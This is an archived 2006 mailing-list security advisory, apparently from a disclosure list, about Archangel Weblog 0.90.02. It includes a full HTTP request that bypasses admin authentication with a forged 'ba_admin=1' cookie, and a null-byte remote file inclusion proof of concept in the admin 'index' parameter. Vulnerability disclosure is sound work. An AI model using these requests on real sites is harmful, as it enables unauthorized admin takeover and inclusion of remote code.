Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | Archangel Weblog 0.90.02 Admin Authentication Bypass & Remote File Inclusion |
|---|---|
| Date: | 26 Feb 2006 13:23:45 -0000 |
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 KingOfSka - http://www.cpc.info.ms Contro Potere Crew Advisories #5 26/02/2006 http://www.archangelmgt.com/ Archangel Weblog 0.90.02 Admin Authentication Bypass & Remote File Inclusion ######################################################### #1:. Background : Archangel Weblog is a new, full featured weblog application. Written in PHP and using a MySQL database backend, Archangel Weblog is easy to install, easy to configure and customize, and easy to use for most anyone. #2:. The Bug : The bug is caused by an insufficient filtering of user submitted input.A malicious user, could easily forge cookies to obtain unauthorized administrator credentials, and trhough the administration panel is possible to perform a Local\Remote File Inclusion. #3:. Exploiting : To get administrator access to the weblog script, just use a get request like this: [http get request] GET http://127.0.0.1/awb/admin/index.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051229 Firefox/1.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cookie: ba_admin=1 Cache-Control: max-age=0 [/http get request] or just add the cookie to your request.. Now, take a look at /admin/index.php , line 54: <?php include($index . ".php"); ?> So, arbitrary file inclusion is possible, by using NULL char to filter out the .php extension. PoC: http://127.0.0.1/awb/admin/index.php?index=http://www.google.it%00 #4:. Vendor Status / Patch : No Contact #5:. Links : http://contropotere.netsons.org/kingofska.asc - Public GnuPG Key http://contropotere.netsons.org - Contro Potere Crew Forums , here you can ask for an unofficial patch or for more info. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (GNU/Linux) iQEVAwUBRAGtT3X+WtVr4QeuAQLX7wf+Jlgo5XekN+Bccqh7rl/5NJEcGkdWBtRo aQRzveUw2NYVdeBSTCszsSfWwW2fiAfPqWqQTQlrzNQNvka2Q34MO1qBxZ//6L0L Cu8GrAbNIUwb8jeK4nOLSG9hoBJ/2Nh+GRk4C39Rqtr7i5kQl28Ca4MDi21eID2K u/K7dWQlIFrQcfHPUSFjGNTdMu5mHycKmUEl52KYdofUG5pHDW0cX4deZNcc93L8 ZNMFKCXL6XM0x42/xdmUWpP0ySMpMVoRJxpGS1WCUtpTqorPQPq025ZIB91l9E8j x9UaRiRzy4mS7kTN5+mOl/3yZUoN+KsFo9HY7WPL3BBD2Z+wAU2Wbg== =bJwT -----END PGP SIGNATURE-----
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | Re: PwsPHP Injection SQL on Index.php, zeta_2_ |
|---|---|
| Next by Date: | Thomson SpeedTouch 500 modems vulnerable to XSS, preben |
| Previous by Thread: | Norton Monitoring Systems funny problems, Alexander Hristov |
| Next by Thread: | Thomson SpeedTouch 500 modems vulnerable to XSS, preben |
| Indexes: | [Date] [Thread] [Top] [All Lists] |